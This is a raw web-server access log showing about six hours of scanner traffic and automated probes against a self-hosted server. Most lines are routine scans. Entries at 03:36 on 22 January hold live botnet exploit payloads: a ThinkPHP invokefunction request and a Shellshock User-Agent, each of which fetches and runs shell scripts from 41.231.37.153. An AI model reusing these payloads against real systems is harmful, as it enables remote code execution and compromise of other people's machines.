"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[21/Jan/2026:22:27:43 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[21/Jan/2026:22:34:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:34:46 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[21/Jan/2026:22:41:35 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:22:46:07 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:46:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:50:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:54:17 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:23:01:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 58.152.46.220] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115." "-" +[21/Jan/2026:23:05:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:06:48 +0000] 200 - GET http pma.profibot.synology.me "/" [Client 91.224.92.99] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:49 +0000] 404 - GET http pma.profibot.synology.me "/wp-includes/ID3/license.txt" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:49 +0000] 404 - GET http pma.profibot.synology.me "/feed/" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:49 +0000] 404 - GET http pma.profibot.synology.me "/xmlrpc.php?rsd" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:49 +0000] 404 - GET http pma.profibot.synology.me "/blog/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:50 +0000] 404 - GET http pma.profibot.synology.me "/web/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:50 +0000] 404 - GET http pma.profibot.synology.me "/wordpress/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:50 +0000] 404 - GET http pma.profibot.synology.me "/wp/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:50 +0000] 404 - GET http pma.profibot.synology.me "/2020/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:51 +0000] 404 - GET http pma.profibot.synology.me "/2019/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:51 +0000] 404 - GET http pma.profibot.synology.me "/2021/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:51 +0000] 404 - GET http pma.profibot.synology.me "/shop/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:51 +0000] 404 - GET http pma.profibot.synology.me "/wp1/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:52 +0000] 404 - GET http pma.profibot.synology.me "/test/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:52 +0000] 404 - GET http pma.profibot.synology.me "/site/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:52 +0000] 404 - GET http pma.profibot.synology.me "/cms/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[21/Jan/2026:23:06:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.224.92.99] [Length 0] [Gzip -] "-" "-" +[21/Jan/2026:23:07:29 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[21/Jan/2026:23:10:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:29:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:33:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:37:19 +0000] 404 - GET http 91.82.83.208 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:23:38:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:38:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:47:07 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:23:48:27 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:00:00:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:05:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 147.185.133.5] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[22/Jan/2026:00:06:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:23:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:23:56 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; VTR-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[22/Jan/2026:00:25:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:31:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:33:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:42:36 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.83] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[22/Jan/2026:00:51:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:00:52:43 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:00:52:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.194] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:00:52:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 206.168.34.194] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:00:52:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.194] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:00:53:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.194] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:00:53:32 +0000] 404 - GET http 91.82.83.208 "/wiki" [Client 206.168.34.194] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:00:59:50 +0000] 400 - - http localhost "-" [Client 20.118.32.39] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:01:07:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:10:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:18:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:18:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:20:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[22/Jan/2026:01:22:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:32:12 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:01:39:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:01:41:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:01:41:47 +0000] 404 - GET http 91.82.83.208 "/login" [Client 103.252.89.75] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[22/Jan/2026:01:52:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.85.46] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:01:56:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:04:03 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:09:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:14:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:18:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:19:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 172.236.228.193] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[22/Jan/2026:02:32:38 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:33:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:39:44 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:02:40:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:50:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:02:53:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[22/Jan/2026:02:54:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:02:54:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:02:57:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[22/Jan/2026:02:58:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:00:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:07:52 +0000] 400 - - http localhost "-" [Client 2.57.121.22] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:08:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 2.57.121.22] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:15:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[22/Jan/2026:03:15:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:22:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:23:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:33:25 +0000] 400 - - http localhost "-" [Client 2.57.121.22] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:33:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 2.57.121.22] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:36:21 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:03:36:21 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:03:36:21 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:03:36:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=6f71068b||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=6f71068b||curl -s http://41.231.37.153/rondo.qre.sh?=6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[22/Jan/2026:03:36:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:03:48:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:53:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:03:56:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:07:59 +0000] 405 - POST http 91.82.83.208 "/" [Client 195.178.110.25] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:04:07:59 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:04:08:00 +0000] 404 - POST http 91.82.83.208 "/api" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:04:08:00 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[22/Jan/2026:04:08:00 +0000] 404 - POST http 91.82.83.208 "/app" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:04:08:00 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:04:08:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:10:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:11:10 +0000] 400 - GET http 91.82.83.208 "/" [Client 13.89.124.213] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[22/Jan/2026:04:11:10 +0000] 400 - - http localhost "-" [Client 13.89.124.213] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:04:14:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] 